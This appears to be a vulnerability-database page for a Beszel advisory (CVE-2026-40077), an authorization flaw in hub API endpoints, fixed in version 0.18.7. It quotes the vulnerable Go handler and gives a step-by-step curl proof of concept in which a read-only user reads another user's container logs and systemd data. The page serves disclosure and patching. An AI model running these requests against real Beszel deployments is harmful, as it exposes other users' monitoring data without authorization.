GHSA-5F5R-95PG-XRPM

Vulnerability from github – Published: 2026-04-10 17:32 – Updated: 2026-04-10 17:32
VLAI?
Summary
Beszel has an IDOR in hub API endpoints that read system ID from URL parameter
Details

Summary

Some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system's ID.

System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string.

Affected Component

  • File: internal/hub/api.go, lines 283–361
  • Endpoints:
  • GET /api/beszel/containers/logs?system=SYSTEM_ID&container=CONTAINER_ID
  • GET /api/beszel/containers/info?system=SYSTEM_ID&container=CONTAINER_ID
  • GET /api/beszel/systemd/info?system=SYSTEM_ID&service=SERVICE_NAME
  • POST /api/beszel/smart/refresh?system=SYSTEM_ID
  • Commit: c7261b56f1bfb9ae57ef0856a0052cabb2fd3b84

Vulnerable Code

The containerRequestHandler function retrieves a system by ID but never verifies the authenticated user is a member of that system:

// internal/hub/api.go:283-305
func (h *Hub) containerRequestHandler(e *core.RequestEvent, fetchFunc func(*systems.System, string) (string, error), responseKey string) error {
    systemID := e.Request.URL.Query().Get("system")
    containerID := e.Request.URL.Query().Get("container")

    if systemID == "" || containerID == "" {
        return e.JSON(http.StatusBadRequest, map[string]string{"error": "system and container parameters are required"})
    }
    if !containerIDPattern.MatchString(containerID) {
        return e.JSON(http.StatusBadRequest, map[string]string{"error": "invalid container parameter"})
    }

    system, err := h.sm.GetSystem(systemID)
    // ^^^ No authorization check: e.Auth.Id is never verified against system.users
    if err != nil {
        return e.JSON(http.StatusNotFound, map[string]string{"error": "system not found"})
    }

    data, err := fetchFunc(system, containerID)
    if err != nil {
        return e.JSON(http.StatusNotFound, map[string]string{"error": err.Error()})
    }

    return e.JSON(http.StatusOK, map[string]string{responseKey: data})
}

The same pattern applies to getSystemdInfo (lines 322–340) and refreshSmartData (lines 342–361).

Meanwhile, the standard PocketBase collection API enforces proper membership checks:

// internal/hub/collections.go:56-57
systemsMemberRule := authenticatedRule + " && users.id ?= @request.auth.id"
systemMemberRule  := authenticatedRule + " && system.users.id ?= @request.auth.id"

These rules are only applied to the PocketBase collection endpoints, not to the custom routes registered on apiAuth.

PoC

The proof: The standard PocketBase API returns 404 (system not found) for unassigned systems. The custom endpoints resolve the system, contact the agent, and return data — proving the authorization check is missing.

Step 1: Start the hub

cd ~/Evidence/henrygd/beszel/finding418/docker-poc/
docker compose up -d

Wait a few seconds, then verify:

curl -s http://localhost:8090/api/health

Expected: {"message":"API is healthy.","code":200,"data":{}}

Step 2: Create User A (admin)

Open http://localhost:8090 in a browser and create the first user:

  • Email: usera@test.com
  • Password: testpassword1

Step 3: Create User B (readonly)

In the Beszel UI, go to Users and add a new user:

  • Email: userb@test.com
  • Password: testpassword2
  • Role: readonly

Step 4: Authenticate as User A

TOKEN_A=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"usera@test.com","password":"testpassword1"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_A=$TOKEN_A"

Step 5: Get hub public key

HUB_KEY=$(curl -s http://localhost:8090/api/beszel/getkey \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['key'])")

echo "HUB_KEY=$HUB_KEY"

Step 6: Create a universal token and start the agent

UTOK_A=$(curl -s "http://localhost:8090/api/beszel/universal-token?enable=1" \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "UTOK_A=$UTOK_A"

Find the Docker network the hub is on:

NETWORK=$(docker inspect beszel-hub --format '{{range $k,$v := .NetworkSettings.Networks}}{{$k}}{{end}}')
echo "Network: $NETWORK"

Start the agent on the same network so the hub can reach it:

docker run -d --name beszel-agent-a \
  --network "$NETWORK" \
  -e HUB_URL=http://beszel-hub:8090 \
  -e TOKEN="$UTOK_A" \
  -e KEY="$HUB_KEY" \
  henrygd/beszel-agent:latest

Wait a few seconds for the agent to register:

sleep 5

Step 7: Verify User A sees the system

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" | python3 -m json.tool

You should see one system in items. Save the system ID:

SYSTEM_A_ID=$(curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['items'][0]['id'])")

echo "SYSTEM_A_ID=$SYSTEM_A_ID"

Step 8: Authenticate as User B (readonly)

TOKEN_B=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"userb@test.com","password":"testpassword2"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_B=$TOKEN_B"

Verify User B sees NO systems:

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: "totalItems": 0

Step 9: Control test — standard API blocks User B

echo "=== Standard PocketBase API ==="
curl -s -w "\nHTTP Status: %{http_code}\n" \
  "http://localhost:8090/api/collections/systems/records/$SYSTEM_A_ID" \
  -H "Authorization: $TOKEN_B"

Expected: 404 — RBAC correctly hides the system from User B.

Step 10: IDOR — SMART refresh (User B triggers action on User A's system)

echo "=== IDOR: POST /api/beszel/smart/refresh ==="
curl -s "http://localhost:8090/api/beszel/smart/refresh?system=$SYSTEM_A_ID" \
  -X POST -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: The hub processes the request and contacts the agent. Any response (data or agent error) proves the IDOR — compare with the 404 from Step 9.

Step 11: IDOR — Systemd info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/systemd/info ==="
curl -s "http://localhost:8090/api/beszel/systemd/info?system=$SYSTEM_A_ID&service=sshd" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: Hub contacts the agent and returns systemd data or an agent-level error.

Step 12: IDOR — Container logs (User B reads from User A's system)

Container endpoints require a Docker container ID (12-64 hex chars). Get a real one from the agent's host:

# Get a real container ID from Docker (first 12 hex chars)
CONTAINER_ID=$(docker ps --format '{{.ID}}' | head -1)
echo "CONTAINER_ID=$CONTAINER_ID"

echo "=== IDOR: GET /api/beszel/containers/logs ==="
curl -s "http://localhost:8090/api/beszel/containers/logs?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Step 13: IDOR — Container info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/containers/info ==="
curl -s "http://localhost:8090/api/beszel/containers/info?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Impact

  • Container logs: Content of recent application logs, potentially including sensitive information
  • Container info: Content of Docker engine API's /containers/{id}/json endpoint, excluding environment variables
  • Systemd info: Unit properties and status for any monitored service
  • SMART refresh: Trigger a SMART data update on any system
Severity ?
3.5 (Low)
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.18.6"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/henrygd/beszel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.18.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40077"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T17:32:05Z",
    "nvd_published_at": "2026-04-09T20:16:27Z",
    "severity": "LOW"
  },
  "details": "## Summary\nSome API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID.\n\nSystem IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the `containers` endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string.\n\n## Affected Component\n\n- **File:** `internal/hub/api.go`, lines 283\u2013361\n- **Endpoints:**\n  - `GET /api/beszel/containers/logs?system=SYSTEM_ID\u0026container=CONTAINER_ID`\n  - `GET /api/beszel/containers/info?system=SYSTEM_ID\u0026container=CONTAINER_ID`\n  - `GET /api/beszel/systemd/info?system=SYSTEM_ID\u0026service=SERVICE_NAME`\n  - `POST /api/beszel/smart/refresh?system=SYSTEM_ID`\n- **Commit:** c7261b56f1bfb9ae57ef0856a0052cabb2fd3b84\n\n## Vulnerable Code\n\nThe `containerRequestHandler` function retrieves a system by ID but never verifies the authenticated user is a member of that system:\n\n```go\n// internal/hub/api.go:283-305\nfunc (h *Hub) containerRequestHandler(e *core.RequestEvent, fetchFunc func(*systems.System, string) (string, error), responseKey string) error {\n    systemID := e.Request.URL.Query().Get(\"system\")\n    containerID := e.Request.URL.Query().Get(\"container\")\n\n    if systemID == \"\" || containerID == \"\" {\n        return e.JSON(http.StatusBadRequest, map[string]string{\"error\": \"system and container parameters are required\"})\n    }\n    if !containerIDPattern.MatchString(containerID) {\n        return e.JSON(http.StatusBadRequest, map[string]string{\"error\": \"invalid container parameter\"})\n    }\n\n    system, err := h.sm.GetSystem(systemID)\n    // ^^^ No authorization check: e.Auth.Id is never verified against system.users\n    if err != nil {\n        return e.JSON(http.StatusNotFound, map[string]string{\"error\": \"system not found\"})\n    }\n\n    data, err := fetchFunc(system, containerID)\n    if err != nil {\n        return e.JSON(http.StatusNotFound, map[string]string{\"error\": err.Error()})\n    }\n\n    return e.JSON(http.StatusOK, map[string]string{responseKey: data})\n}\n```\n\nThe same pattern applies to `getSystemdInfo` (lines 322\u2013340) and `refreshSmartData` (lines 342\u2013361).\n\nMeanwhile, the standard PocketBase collection API enforces proper membership checks:\n\n```go\n// internal/hub/collections.go:56-57\nsystemsMemberRule := authenticatedRule + \" \u0026\u0026 users.id ?= @request.auth.id\"\nsystemMemberRule  := authenticatedRule + \" \u0026\u0026 system.users.id ?= @request.auth.id\"\n```\n\nThese rules are only applied to the PocketBase collection endpoints, **not** to the custom routes registered on `apiAuth`.\n\n### PoC\n**The proof:** The standard PocketBase API returns `404` (system not found) for unassigned systems. The custom endpoints resolve the system, contact the agent, and return data \u2014 proving the authorization check is missing.\n\n#### Step 1: Start the hub\n\n```bash\ncd ~/Evidence/henrygd/beszel/finding418/docker-poc/\ndocker compose up -d\n```\n\nWait a few seconds, then verify:\n\n```bash\ncurl -s http://localhost:8090/api/health\n```\n\nExpected: `{\"message\":\"API is healthy.\",\"code\":200,\"data\":{}}`\n\n#### Step 2: Create User A (admin)\n\nOpen `http://localhost:8090` in a browser and create the first user:\n\n- Email: `usera@test.com`\n- Password: `testpassword1`\n\n#### Step 3: Create User B (readonly)\n\nIn the Beszel UI, go to Users and add a new user:\n\n- Email: `userb@test.com`\n- Password: `testpassword2`\n- Role: **readonly**\n\n#### Step 4: Authenticate as User A\n\n```bash\nTOKEN_A=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"identity\":\"usera@test.com\",\"password\":\"testpassword1\"}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"TOKEN_A=$TOKEN_A\"\n```\n\n#### Step 5: Get hub public key\n\n```bash\nHUB_KEY=$(curl -s http://localhost:8090/api/beszel/getkey \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027key\u0027])\")\n\necho \"HUB_KEY=$HUB_KEY\"\n```\n\n#### Step 6: Create a universal token and start the agent\n\n```bash\nUTOK_A=$(curl -s \"http://localhost:8090/api/beszel/universal-token?enable=1\" \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"UTOK_A=$UTOK_A\"\n```\n\nFind the Docker network the hub is on:\n\n```bash\nNETWORK=$(docker inspect beszel-hub --format \u0027{{range $k,$v := .NetworkSettings.Networks}}{{$k}}{{end}}\u0027)\necho \"Network: $NETWORK\"\n```\n\nStart the agent on the **same network** so the hub can reach it:\n\n```bash\ndocker run -d --name beszel-agent-a \\\n  --network \"$NETWORK\" \\\n  -e HUB_URL=http://beszel-hub:8090 \\\n  -e TOKEN=\"$UTOK_A\" \\\n  -e KEY=\"$HUB_KEY\" \\\n  henrygd/beszel-agent:latest\n```\n\nWait a few seconds for the agent to register:\n\n```bash\nsleep 5\n```\n\n#### Step 7: Verify User A sees the system\n\n```bash\ncurl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_A\" | python3 -m json.tool\n```\n\nYou should see one system in `items`. Save the system ID:\n\n```bash\nSYSTEM_A_ID=$(curl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027items\u0027][0][\u0027id\u0027])\")\n\necho \"SYSTEM_A_ID=$SYSTEM_A_ID\"\n```\n\n#### Step 8: Authenticate as User B (readonly)\n\n```bash\nTOKEN_B=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"identity\":\"userb@test.com\",\"password\":\"testpassword2\"}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"TOKEN_B=$TOKEN_B\"\n```\n\nVerify User B sees NO systems:\n\n```bash\ncurl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: `\"totalItems\": 0`\n\n#### Step 9: Control test \u2014 standard API blocks User B\n\n```bash\necho \"=== Standard PocketBase API ===\"\ncurl -s -w \"\\nHTTP Status: %{http_code}\\n\" \\\n  \"http://localhost:8090/api/collections/systems/records/$SYSTEM_A_ID\" \\\n  -H \"Authorization: $TOKEN_B\"\n```\n\nExpected: **404** \u2014 RBAC correctly hides the system from User B.\n\n#### Step 10: IDOR \u2014 SMART refresh (User B triggers action on User A\u0027s system)\n\n```bash\necho \"=== IDOR: POST /api/beszel/smart/refresh ===\"\ncurl -s \"http://localhost:8090/api/beszel/smart/refresh?system=$SYSTEM_A_ID\" \\\n  -X POST -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: The hub processes the request and contacts the agent. Any response (data or agent error) proves the IDOR \u2014 compare with the 404 from Step 9.\n\n#### Step 11: IDOR \u2014 Systemd info (User B reads from User A\u0027s system)\n\n```bash\necho \"=== IDOR: GET /api/beszel/systemd/info ===\"\ncurl -s \"http://localhost:8090/api/beszel/systemd/info?system=$SYSTEM_A_ID\u0026service=sshd\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: Hub contacts the agent and returns systemd data or an agent-level error.\n\n#### Step 12: IDOR \u2014 Container logs (User B reads from User A\u0027s system)\n\nContainer endpoints require a Docker container ID (12-64 hex chars). Get a real one from the agent\u0027s host:\n\n```bash\n# Get a real container ID from Docker (first 12 hex chars)\nCONTAINER_ID=$(docker ps --format \u0027{{.ID}}\u0027 | head -1)\necho \"CONTAINER_ID=$CONTAINER_ID\"\n\necho \"=== IDOR: GET /api/beszel/containers/logs ===\"\ncurl -s \"http://localhost:8090/api/beszel/containers/logs?system=$SYSTEM_A_ID\u0026container=$CONTAINER_ID\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\n#### Step 13: IDOR \u2014 Container info (User B reads from User A\u0027s system)\n\n```bash\necho \"=== IDOR: GET /api/beszel/containers/info ===\"\ncurl -s \"http://localhost:8090/api/beszel/containers/info?system=$SYSTEM_A_ID\u0026container=$CONTAINER_ID\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\n### Impact\n\n- **Container logs**: Content of recent application logs, potentially including sensitive information\n- **Container info**: Content of Docker engine API\u0027s `/containers/{id}/json` endpoint, excluding environment variables\n- **Systemd info**: Unit properties and status for any monitored service\n- **SMART refresh**: Trigger a SMART data update on any system",
  "id": "GHSA-5f5r-95pg-xrpm",
  "modified": "2026-04-10T17:32:05Z",
  "published": "2026-04-10T17:32:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40077"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/henrygd/beszel"
    },
    {
      "type": "WEB",
      "url": "https://github.com/henrygd/beszel/releases/tag/v0.18.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Beszel has an IDOR in hub API endpoints that read system ID from URL parameter"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.